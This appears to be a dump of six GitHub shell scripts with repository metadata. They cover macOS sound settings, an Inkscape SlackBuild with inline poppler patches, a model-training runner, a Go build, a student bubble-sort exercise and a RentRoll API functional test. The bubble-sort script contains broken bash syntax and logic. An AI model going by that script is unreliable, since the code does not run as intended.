|
ea7ca196878c1127fec73209ce5e0b731376b249
|
Shell
|
urmyfaith/sinstallation
|
/preferences/sound.sh
|
UTF-8
| 2,918
| 2.65625
| 3
|
[] |
no_license
|
################################################################################
# Sound
################################################################################
# Toggle Startup Sound
function osx_sound_startup_chime {
local enabled; if [[ "$1" == "enabled" ]]; then enabled="true"; else enabled="false"; fi
if [[ "$enabled" == "true" ]]; then
sudo nvram -d SystemAudioVolume
else
sudo nvram SystemAudioVolume=" "
fi
}
# Toggle Volume Feedback Sound
function osx_sound_volume_feedback {
local enabled; if [[ "$1" == "enabled" ]]; then enabled="1"; else enabled="0"; fi
defaults write NSGlobalDomain com.apple.sound.beep.feedback -int $enabled
}
# Set the Audio Bitpool for Bluetooth Audio Devices
function osx_sound_bluetooth_optimum {
defaults write com.apple.BluetoothAudioAgent "Apple Bitpool Min (editable)" 35
defaults write com.apple.BluetoothAudioAgent "Apple Initial Bitpool Min (editable)" 53
defaults write com.apple.BluetoothAudioAgent "Apple Initial Bitpool (editable)" 35
}
# Toggle UI Sound Effects
function osx_sound_ui {
local enabled; if [[ "$1" == "enabled" ]]; then enabled="true"; else enabled="false"; fi
local enabled_int; if [[ "$1" == "enabled" ]]; then enabled_int="1"; else enabled_int="0"; fi; shift 1;
local value="$1"; shift 1;
defaults write com.apple.systemsound com.apple.sound.uiaudio.enabled -int $enabled_int
defaults write com.apple.finder FinderSounds -bool $enabled
defaults write com.apple.systemsound com.apple.sound.beep.volume -float $value
}
# Toggle Speech Recognition
function osx_sound_speech_recognition {
local enabled; if [[ "$1" == "enabled" ]]; then enabled="true"; else enabled="false"; fi
sudo defaults write com.apple.speech.recognition.AppleSpeechRecognition.prefs StartSpeakableItems -bool $enabled
}
# Toggle Text to Speech
function osx_sound_text_to_speech {
local enabled; if [[ "$1" == "enabled" ]]; then enabled="true"; else enabled="false"; fi
sudo defaults write com.apple.speech.synthesis.general.prefs TalkingAlertsSpeakTextFlag -bool $enabled
sudo defaults write com.apple.speech.synthesis.general.prefs SpokenNotificationAppActivationFlag -bool $enabled
sudo defaults write com.apple.speech.synthesis.general.prefs SpokenUIUseSpeakingHotKeyFlag -bool $enabled
sudo sh -c "defaults delete com.apple.speech.synthesis.general.prefs TimeAnnouncementPrefs 2> /dev/null"
}
# Disable VoiceOver service.
function osx_sound_voiceover {
local enabled; if [[ "$1" == "enabled" ]]; then enabled="load"; else enabled="unload"; fi
sudo sh -c "launchctl $enabled -w /System/Library/LaunchAgents/com.apple.VoiceOver.plist 2> /dev/null"
sudo sh -c "launchctl $enabled -w /System/Library/LaunchAgents/com.apple.ScreenReaderUIServer.plist 2> /dev/null"
sudo sh -c "launchctl $enabled -w /System/Library/LaunchAgents/com.apple.scrod.plist 2> /dev/null"
}
| true
|
9608c1a412c5e0a6f1f0147e1deb77270e5ec84d
|
Shell
|
Obliteron/tde-slackbuilds
|
/Misc/inkscape/inkscape.SlackBuild
|
UTF-8
| 7,604
| 3.0625
| 3
|
[] |
no_license
|
#!/bin/sh
# Generated by Alien's SlackBuild Toolkit: http://slackware.com/~alien/AST
# Copyright 2009, 2010, 2011, 2012, 2013, 2014, 2015 Eric Hameleers, Eindhoven, Netherlands
# Copyright 2015-2017 Thorn Inurcide
# Copyright 2015-2017 tde-slackbuilds project on GitHub
# All rights reserved.
#
# Permission to use, copy, modify, and distribute this software for
# any purpose with or without fee is hereby granted, provided that
# the above copyright notice and this permission notice appear in all
# copies.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE AUTHORS AND COPYRIGHT HOLDERS AND THEIR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
# USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
PRGNAM=inkscape
VERSION=${VERSION:-0.92.3}
BUILD=${BUILD:-1}
SRCURL="https://media.inkscape.org/dl/resources/file/inkscape-$VERSION.tar.bz2"
source ../../get-source.sh
getsource_fn
untar_fn
## install to .../lib64 on 64-bit system
[[ -d /lib64 ]] && \
{ ## set RPATH
sed -i "s|ORIGIN/../lib/inkscape|ORIGIN/../lib$LIBDIRSUFFIX/inkscape|" CMakeLists.txt
## set output directory
sed -i "s|/lib |/lib$LIBDIRSUFFIX |" CMakeLists.txt
## for dynamic lib
sed -i "s|lib/inkscape|lib$LIBDIRSUFFIX/inkscape|" src/CMakeLists.txt
## for static libs
sed -i "s|lib/inkscape|lib$LIBDIRSUFFIX/inkscape|" CMakeScripts/HelperMacros.cmake
}
## only build for required locales
{
## .. for po/LINGUAS
LOCALES=$(cat po/LINGUAS)
rm po/LINGUAS
for locale in $I18N
do
[[ $LOCALES == *$locale* ]] && \
echo $locale >> po/LINGUAS
done
## set up a directory to store the required locale files temporarily
TEMP_DIR=$TMP_BUILD/tmp-$PRGNAM/loc_tmp
mkdir $TEMP_DIR
## .. for READMEs
for locale in $I18N
do
mv README.$locale.txt $TEMP_DIR
done
rm README.*.txt
mv $TEMP_DIR/* .
RM_LIST=$(ls -1 README*)
## .. for keys.*.html
for locale in $I18N
do
mv doc/keys.$locale.html $TEMP_DIR
done
rm doc/keys.*.html
mv $TEMP_DIR/* doc/
KEYS_LIST=$(ls -1 doc/keys.*)
## .. for translations
for locale in $I18N
do
mv po/$locale.po $TEMP_DIR
done
rm -rf po/*.po
mv $TEMP_DIR/* po/
## .. for tutorials
for locale in $I18N
do
mv share/tutorials/*.$locale.* $TEMP_DIR
done
rm share/tutorials/*.*.*
mv $TEMP_DIR/* share/tutorials/
## .. for templates
for locale in $I18N
do
mv share/templates/*.$locale.* $TEMP_DIR
done
rm share/templates/*.*.*
mv $TEMP_DIR/* share/templates/
} || true
## https://gitlab.com/inkscape/inkscape/commit/a600c6438fef2f4c06f9a4a7d933d99fb054a973
## Fix compilation with poppler 0.64
echo $'--- src/extension/internal/pdfinput/pdf-parser.cpp
+++ src/extension/internal/pdfinput/pdf-parser.cpp
@@ -2585,1 +2585,1 @@
-void PdfParser::doShowText(GooString *s) {
+void PdfParser::doShowText(const GooString *s) {
@@ -2604,1 +2604,1 @@
- builder->beginString(state, s);
+ builder->beginString(state);
@@ -2634,1 +2634,1 @@
- p = s->getCString();
+ p = g_strdup(s->getCString());
@@ -2689,1 +2689,1 @@
- p = s->getCString();
+ p = g_strdup(s->getCString());
@@ -2735,1 +2735,1 @@
- char *name = args[0].getName();
+ char *name = g_strdup(args[0].getName());
--- src/extension/internal/pdfinput/pdf-parser.h
+++ src/extension/internal/pdfinput/pdf-parser.h
@@ -290,1 +290,1 @@
- void doShowText(GooString *s);
+ void doShowText(const GooString *s);
--- src/extension/internal/pdfinput/svg-builder.cpp
+++ src/extension/internal/pdfinput/svg-builder.cpp
@@ -1023,1 +1023,1 @@
- _font_specification = font->getName()->getCString();
+ _font_specification = g_strdup(font->getName()->getCString());
@@ -1364,1 +1364,1 @@
-void SvgBuilder::beginString(GfxState *state, GooString * /*s*/) {
+void SvgBuilder::beginString(GfxState *state) {
--- src/extension/internal/pdfinput/svg-builder.h
+++ src/extension/internal/pdfinput/svg-builder.h
@@ -32,1 +32,0 @@
-class GooString;
@@ -139,1 +138,1 @@
- void beginString(GfxState *state, GooString *s);
+ void beginString(GfxState *state);
' | while read line
do
patch -p0
done
## https://gitlab.com/inkscape/inkscape/commit/10e8ae0ff522d3a9caeed9a7f137cdfd795ba0a3
## Fix compilation with poppler 0.65.0
## replace unused includes with one that is actually used
echo $'--- src/extension/internal/pdfinput/pdf-parser.cpp
+++ src/extension/internal/pdfinput/pdf-parser.cpp
@@ -40,2 +40,1 @@
-#include "goo/GooTimer.h"
-#include "goo/GooHash.h"
+#include "goo/GooString.h"
' | while read line
do
patch -p0
done
chown_fn
listdocs_fn
cd_builddir_fn
## default options have been pulled from CMakeLists.txt
cmake \
-DCMAKE_C_FLAGS:STRING="$SLKCFLAGS" \
-DCMAKE_CXX_FLAGS:STRING="$SLKCFLAGS" \
-DCMAKE_C_FLAGS_RELEASE:STRING="$SLKCFLAGS" \
-DCMAKE_CXX_FLAGS_RELEASE:STRING="$SLKCFLAGS" \
-DCMAKE_C_COMPILER=$COMPILER \
-DCMAKE_CXX_COMPILER=$COMPILER_CXX \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_INSTALL_PREFIX=/usr/local \
-DWITH_NLS="ON" \
-DWITH_DBUS="OFF" \
-DENABLE_LCMS="ON" \
-DWITH_GNOME_VFS="ON" \
-DWITH_SVG2="ON" \
-DWITH_LPETOOL="OFF" \
-DWITH_INKJAR="ON" \
-DWITH_OPENMP="ON" \
-DWITH_PROFILING="OFF" \
-DENABLE_POPPLER="ON" \
-DENABLE_POPPLER_CAIRO="ON" \
-DWITH_IMAGE_MAGICK="ON" \
-DWITH_LIBCDR="ON" \
-DWITH_LIBVISIO="ON" \
-DWITH_LIBWPG="ON" \
-DWITH_GTK3_EXPERIMENTAL="OFF" \
-DENABLE_BINRELOC="OFF" \
..
make_fn
## only package man pages for required locales
{ for locale in $I18N
do
mv $PKG/usr/local/share/man/man1/inkscape.$locale.1 $TEMP_DIR
done
rm $PKG/usr/local/share/man/man1/inkscape.*.1
mv $TEMP_DIR/* $PKG/usr/local/share/man/man1/
} || true
installdocs_fn
#mangzip_fn
strip_fn
mkdir_install_fn
echo "
# HOW TO EDIT THIS FILE:
# The 'handy ruler' below makes it easier to edit a package description. Line
# up the first '|' above the ':' following the base package name, and the '|' on
# the right side marks the last column you can put a character in. You must make
# exactly 11 lines for the formatting to be correct. It's also customary to
# leave one space after the ':'.
|-----handy-ruler------------------------------------------------------|
$PRGNAM: Inkscape (Open Source vector graphics editor)
$PRGNAM:
$PRGNAM: Inkscape is an Open Source vector graphics editor, with capabilities
$PRGNAM: similar to Illustrator, Freehand, CorelDraw, or Xara X using the W3C
$PRGNAM: standard Scalable Vector Graphics (SVG) file format.
$PRGNAM:
$PRGNAM:
$PRGNAM:
$PRGNAM: With language support for:
$PRGNAM: en $(echo $(cat ../po/LINGUAS))
$PRGNAM:
$PRGNAM: Homepage: http://www.inkscape.org/
" > $PKG/install/slack-desc
cat <<EOINS >> $PKG/install/doinst.sh
# Update the desktop database:
if [ -x usr/bin/update-desktop-database ]; then
chroot . /usr/bin/update-desktop-database /usr/local/share/applications > /dev/null 2>&1
fi
# Update hicolor theme cache:
if [ -d usr/share/icons/hicolor ]; then
if [ -x /usr/bin/gtk-update-icon-cache ]; then
chroot . /usr/bin/gtk-update-icon-cache -f -t /usr/local/share/icons/hicolor 1> /dev/null 2> /dev/null
fi
fi
EOINS
makepkg_fn
| true
|
414cee55cd71e3d16f273dc0973286e1335e88cc
|
Shell
|
Vanova/voicemap
|
/experiments/runner.sh
|
UTF-8
| 312
| 2.625
| 3
|
[] |
no_license
|
#!/bin/bash
export PYTHONPATH="`pwd`/../:$PYTHONPATH"
source activate ai3
model=siamese
log_dir=../logs/$(date "+%d_%b_%Y")
log_file=$log_dir/${model}_$(date "+%H_%M_%S").log
mkdir $log_dir
echo "Log to: $log_file"
#python -u ./train_sre_siamese.py > ${log_file}
python -u ./train_wav_siamese.py > ${log_file}
| true
|
cc97c69c1e39c115c85e3c8cc2e4fc52793bf562
|
Shell
|
ytsworld/greenhouse-client
|
/scripts/build.sh
|
UTF-8
| 356
| 2.84375
| 3
|
[] |
no_license
|
#! /bin/bash
set -e
# The build has to run on a raspberry device as cross compiling does not work for libraries that use "C"
cd /tmp/greenhouse-client
# Cleanup old binary if exists
if [ -e "./greenhouse-client" ]; then
rm -f "./greenhouse-client"
fi
go get
go build -o greenhouse-client ./cmd
chmod +x greenhouse-client
echo Build was successful
| true
|
3fb76cd9464e6cf45992ea935f1ae4409859de35
|
Shell
|
AditiPawar24/boot-camp-shell-scripting
|
/Assignment4/ExtendArray.sh
|
UTF-8
| 541
| 3.390625
| 3
|
[] |
no_license
|
#!/bin/bash -x
function isSort()
{
echo $1
${#Array[@]}=$1
temp=0
for ((i=0; i <= $((${#Array[@]} - 2)); i++))
do
for ((j=((i+1)); j <= ((${#Array[@]} -1 )); j++))
do
if [[ ${Array[i]} -gt ${Array[j]} ]]
then
temp=${Array[i]};
Array[i]=${Array[j]};
${Array[j]=$temp;
fi
done
done
}
MAXCOUNT=10
COUNT=1
while [ "$COUNT" -le $MAXCOUNT ]
do
Array[$COUNT]=$(( (RANDOM%100) + 99))
let "COUNT += 1"
done
echo ${Array[@]}
result="$( isSort $((${Array[@]})) )"
echo ${result[@]}
| true
|
c841fc1fb2f1e430011fb3a62297b45738b49958
|
Shell
|
sudip-aubergine/rentroll
|
/test/rus/functest.sh
|
UTF-8
| 13,899
| 3.0625
| 3
|
[] |
no_license
|
#!/bin/bash
TESTHOME=..
SRCTOP=${TESTHOME}/..
TESTNAME="RentableUseStatus"
TESTSUMMARY="Test Rentable Use Status code"
DBGENDIR=${SRCTOP}/tools/dbgen
CREATENEWDB=0
RRBIN="${SRCTOP}/tmp/rentroll"
CATRML="${SRCTOP}/tools/catrml/catrml"
#SINGLETEST="" # This runs all the tests
source ${TESTHOME}/share/base.sh
echo "STARTING RENTROLL SERVER"
RENTROLLSERVERAUTH="-noauth"
# RENTROLLSERVERNOW="-testDtNow 10/24/2018"
#------------------------------------------------------------------------------
# TEST a
#
# Validate that the search query returns the proper data
#
# Scenario:
#
# The database in xa should have many use status fields. Triplets of
# the form housekeeping, ready, in-service.
#
#
# Expected Results:
# 1. Search for UseStatus on rentable 4 and make sure that the data
# returned matches the patterns we expect.
#------------------------------------------------------------------------------
TFILES="a"
STEP=0
if [ "${SINGLETEST}${TFILES}" = "${TFILES}" -o "${SINGLETEST}${TFILES}" = "${TFILES}${TFILES}" ]; then
stopRentRollServer
mysql --no-defaults rentroll < x${TFILES}.sql
startRentRollServer
echo "%7B%22cmd%22%3A%22get%22%2C%22selected%22%3A%5B%5D%2C%22limit%22%3A100%2C%22offset%22%3A0%7D" > request
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/4" "request" "${TFILES}${STEP}" "RentableUseStatus-Search"
fi
#------------------------------------------------------------------------------
# TEST c
#
# Error that came up in UI testing. Overlapping of same type should be merged.
#
# Scenario:
#
# Existing db has a use status 4/1/2019 - 7/31/2019 in Ready State. It also
# has a record from 7/31/2019 to 12/31/9999 in Ready state. If we extend
# the latter record 1 or more days forward it should merge the two records.
# Similarly if we extend the former 1 day or more earlier, it should merge the
# two.
#
# Expected Results:
# see detailed comments below. Each case refers to an area in the source
# code that it should hit. If there's anything wrong, we'll know right
# where to go in the source to fix it.
#
#------------------------------------------------------------------------------
TFILES="c"
STEP=0
if [ "${SINGLETEST}${TFILES}" = "${TFILES}" -o "${SINGLETEST}${TFILES}" = "${TFILES}${TFILES}" ]; then
stopRentRollServer
mysql --no-defaults rentroll < x${TFILES}.sql
startRentRollServer
#-----------------------------------
# INITIAL RENTABLE USE STATUS
# Use DtStart DtStop
# ----------------------------
# 0 08/01/2019 - 12/31/9999
# 0 04/01/2019 - 08/01/2019
# 4 03/01/2019 04/01/2019
# 0 01/01/2018 03/01/2019
# Total Records: 4
#-----------------------------------
#--------------------------------------------------
# SetRentableUseStatus - Case 1a
# Note: EDI in effect, DtStop expressed as "through 8/31/2019"
# SetStatus 0 4/1/2019 - 9/1/2019
# Result needs to be:
# Use DtStart DtStop
# ----------------------------
# 0 04/01/2019 - 12/31/9999
# 4 03/01/2019 04/01/2019
# 0 01/01/2018 03/01/2019
# Total Records: 3
# c0,c1
#--------------------------------------------------
encodeRequest '{"cmd":"save","selected":[],"limit":0,"offset":0,"changes":[{"recid":1,"RSID":13,"BID":1,"BUD":"REX","RID":1,"UseStatus":0,"DtStart":"4/1/2019","DtStop":"8/31/2019","Comment":"","CreateBy":211,"LastModBy":211,"w2ui":{}}],"RID":1}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Save"
encodeRequest '{"cmd":"get","selected":[],"limit":100,"offset":0}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Search"
#--------------------------------------------------
# SetRentableUseStatus - Case 1c
# SetStatus 3 4/1/2019 - 9/1/2019
# Note: EDI in effect, DtStop expressed as "through 8/31/2019"
# Result needs to be:
# Use DtStart DtStop
# ----------------------------
# 0 09/01/2019 - 12/31/9999
# 3 04/01/2019 - 09/01/2019
# 4 03/01/2019 04/01/2019
# 0 01/01/2018 03/01/2019
# Total Records: 4
# c3,c4
#--------------------------------------------------
encodeRequest '{"cmd":"save","selected":[],"limit":0,"offset":0,"changes":[{"recid":1,"RSID":13,"BID":1,"BUD":"REX","RID":1,"UseStatus":3,"DtStart":"4/1/2019","DtStop":"8/31/2019","Comment":"","CreateBy":211,"LastModBy":211,"w2ui":{}}],"RID":1}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Save"
encodeRequest '{"cmd":"get","selected":[],"limit":100,"offset":0}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Search"
#-------------------------------------------------------
# SetRentableUseStatus - Case 1b
#-----------------------------------------------
# CASE 1a - rus contains b[0], match == false
#-----------------------------------------------
# b[0]: @@@@@@@@@@@@@@@@@@@@@
# rus: ############
# Result: @@@@@############@@@@
#----------------------------------------------------
# SetStatus 2 9/15/2019 - 9/22/2019
# Note: EDI in effect, DtStop expressed as "through 9/21/2019"
# Result needs to be:
# Use DtStart DtStop RSID
# ---------------------------- ----
# 0 09/22/2019 - 12/31/9999 15
# 2 09/15/2019 - 09/22/2019 16
# 0 09/01/2019 - 09/15/2019 10
# 3 04/01/2019 - 09/01/2019 14
# 4 03/01/2019 04/01/2019 11
# 0 01/01/2018 03/01/2019 5
# Total Records: 6
# c5,c6
#-------------------------------------------------------
encodeRequest '{"cmd":"save","selected":[],"limit":0,"offset":0,"changes":[{"recid":1,"RSID":13,"UseStatus":2,"DtStart":"9/15/2019","DtStop":"9/21/2019","BID":1,"BUD":"REX","RID":1,"Comment":"","CreateBy":211,"LastModBy":211,"w2ui":{}}],"RID":1}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Save"
encodeRequest '{"cmd":"get","selected":[],"limit":100,"offset":0}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Search"
#-------------------------------------------------------
# SetRentableUseStatus - Case 1d
#-----------------------------------------------
# CASE 1d - rus prior to b[0], match == false
#-----------------------------------------------
# rus: @@@@@@@@@@@@
# b[0]: ##########
# Result: ####@@@@@@@@@@@@
#-----------------------------------------------
# SetStatus 1 (repair) 3/15/2019 - 9/1/2019
# Note: EDI in effect, DtStop expressed as "through 8/31/2019"
# Result needs to be:
# Use DtStart DtStop
# ----------------------------
# 0 09/22/2019 - 12/31/9999
# 2 09/15/2019 - 09/22/2019
# 0 09/01/2019 - 09/15/2019
# 1 03/15/2019 - 09/01/2019
# 4 03/01/2018 03/15/2019
# 0 01/01/2018 03/01/2019
# Total Records: 6
# c7,c8
#-------------------------------------------------------
encodeRequest '{"cmd":"save","selected":[],"limit":0,"offset":0,"changes":[{"recid":1,"RSID":0,"UseStatus":1,"DtStart":"3/15/2019","DtStop":"8/31/2019","BID":1,"BUD":"REX","RID":1,"Comment":"","CreateBy":211,"LastModBy":211,"w2ui":{}}],"RID":1}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Save"
encodeRequest '{"cmd":"get","selected":[],"limit":100,"offset":0}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Search"
#-------------------------------------------------------
# SetRentableUseStatus - Case 2b
#-----------------------------------------------
# Case 2b
# neither match. Update both b[0] and b[1], add new rus
# b[0:1] @@@@@@@@@@************
# rus #######
# Result @@@@@@#######*********
#-----------------------------------------------
# SetStatus 3 8/1/2019 - 9/7/2019
# Note: EDI in effect, DtStop expressed as "through 9/6/2019"
# Result needs to be:
# Use DtStart DtStop
# ----------------------------
# 0 09/22/2019 - 12/31/9999
# 2 09/15/2019 - 09/22/2019
# 0 09/01/2019 - 09/15/2019
# 3 08/01/2019 - 09/07/2019
# 1 03/15/2019 - 08/01/2019
# 4 03/01/2018 03/15/2019
# 0 01/01/2018 03/01/2019
# Total Records: 7
# c9,c10
#-------------------------------------------------------
encodeRequest '{"cmd":"save","selected":[],"limit":0,"offset":0,"changes":[{"recid":1,"RSID":13,"UseStatus":3,"DtStart":"8/1/2019","DtStop":"9/6/2019","BID":1,"BUD":"REX","RID":1,"Comment":"","CreateBy":211,"LastModBy":211,"w2ui":{}}],"RID":1}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Save"
encodeRequest '{"cmd":"get","selected":[],"limit":100,"offset":0}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Search"
#-------------------------------------------------------
# SetRentableUseStatus - Case 2c
#-----------------------------------------------
# Case 2c
# merge rus and b[0], update b[1]
# b[0:1] @@@@@@@@@@************
# rus @@@@@@@
# Result @@@@@@@@@@@@@*********
#-----------------------------------------------
# SetStatus 1 7/1/2019 - 8/7/2019
# Note: EDI in effect, DtStop expressed as "through 8/6/2019"
# Result needs to be:
# Use DtStart DtStop
# ----------------------------
# 0 09/22/2019 - 12/31/9999
# 2 09/15/2019 - 09/22/2019
# 0 09/01/2019 - 09/15/2019
# 3 08/07/2019 - 09/07/2019
# 1 03/15/2019 - 08/07/2019
# 4 03/01/2018 03/15/2019
# 0 01/01/2018 03/01/2019
# Total Records: 7
# c11,c12
#-------------------------------------------------------
encodeRequest '{"cmd":"save","selected":[],"limit":0,"offset":0,"changes":[{"recid":1,"RSID":13,"UseStatus":1,"DtStart":"7/1/2019","DtStop":"8/6/2019","BID":1,"BUD":"REX","RID":1,"Comment":"","CreateBy":211,"LastModBy":211,"w2ui":{}}],"RID":1}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Save"
encodeRequest '{"cmd":"get","selected":[],"limit":100,"offset":0}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Search"
#-------------------------------------------------------
# SetRentableUseStatus - Case 2d
#-----------------------------------------------
# Case 2d
# merge rus and b[1], update b[0]
# b[0:1] @@@@@@@@@@************
# rus *******
# Result @@@@@@****************
#-----------------------------------------------
# SetStatus 3 (employee) 8/1/2019 - 8/10/2019
# Note: EDI in effect, DtStop expressed as "through 8/9/2019"
# Result needs to be:
# Use DtStart DtStop
# ----------------------------
# 0 09/22/2019 - 12/31/9999
# 2 09/15/2019 - 09/22/2019
# 0 09/01/2019 - 09/15/2019
# 3 08/01/2019 - 09/07/2019
# 1 03/15/2019 - 08/01/2019
# 4 03/01/2018 03/15/2019
# 0 01/01/2018 03/01/2019
# Total Records: 7
# c13,c14
#-------------------------------------------------------
encodeRequest '{"cmd":"save","selected":[],"limit":0,"offset":0,"changes":[{"recid":1,"RSID":13,"UseStatus":3,"DtStart":"8/1/2019","DtStop":"8/10/2019","BID":1,"BUD":"REX","RID":1,"Comment":"","CreateBy":211,"LastModBy":211,"w2ui":{}}],"RID":1}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Save"
encodeRequest '{"cmd":"get","selected":[],"limit":100,"offset":0}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Search"
#-------------------------------------------------------
# SetRentableUseStatus - Case 2a
#-----------------------------------------------
# Case 2a
# all are the same, merge them all into b[0], delete b[1]
# b[0:1] ********* ************
# rus *******
# Result **********************
#-----------------------------------------------
# SetStatus 0 (ready) 9/7/2019 - 9/30/2019
# Note: EDI in effect, DtStop expressed as "through 9/29/2019"
# Result needs to be:
# Use DtStart DtStop
# ----------------------------
# 0 09/01/2019 - 12/31/9999
# 3 08/01/2019 - 09/07/2019
# 1 03/15/2019 - 08/01/2019
# 4 03/01/2018 03/15/2019
# 0 01/01/2018 03/01/2019
# Total Records: 7
#-------------------------------------------------------
encodeRequest '{"cmd":"save","selected":[],"limit":0,"offset":0,"changes":[{"recid":1,"RSID":13,"UseStatus":0,"DtStart":"9/7/2019","DtStop":"9/29/2019","BID":1,"BUD":"REX","RID":1,"Comment":"","CreateBy":211,"LastModBy":211,"w2ui":{}}],"RID":1}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Save"
encodeRequest '{"cmd":"get","selected":[],"limit":100,"offset":0}'
dojsonPOST "http://localhost:8270/v1/rentableusestatus/1/1" "request" "${TFILES}${STEP}" "RentableUseStatus-Search"
fi
stopRentRollServer
echo "RENTROLL SERVER STOPPED"
logcheck
exit 0
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.